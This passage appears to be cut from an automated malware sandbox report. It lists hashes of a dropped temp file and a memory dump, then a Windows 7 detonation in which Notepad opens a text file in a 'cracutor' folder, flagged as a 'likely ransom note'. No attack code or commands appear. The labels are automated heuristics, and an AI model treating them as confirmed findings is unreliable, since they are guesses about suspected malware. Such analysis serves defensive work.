| SHA512 | 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84 |
C:\Users\Admin\AppData\Local\Tempcrssiycfnb.db
| MD5 | 349e6eb110e34a08924d92f6b334801d |
| SHA1 | bdfb289daff51890cc71697b6322aa4b35ec9169 |
| SHA256 | c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a |
| SHA512 | 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574 |
memory/928-355-0x0000024BC61B0000-0x0000024BC6500000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-05-19 17:20
Reported
2024-05-19 17:23
Platform
win7-20240221-en
Max time kernel
120s
Max time network
121s
Command Line
Signatures
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\123.txt"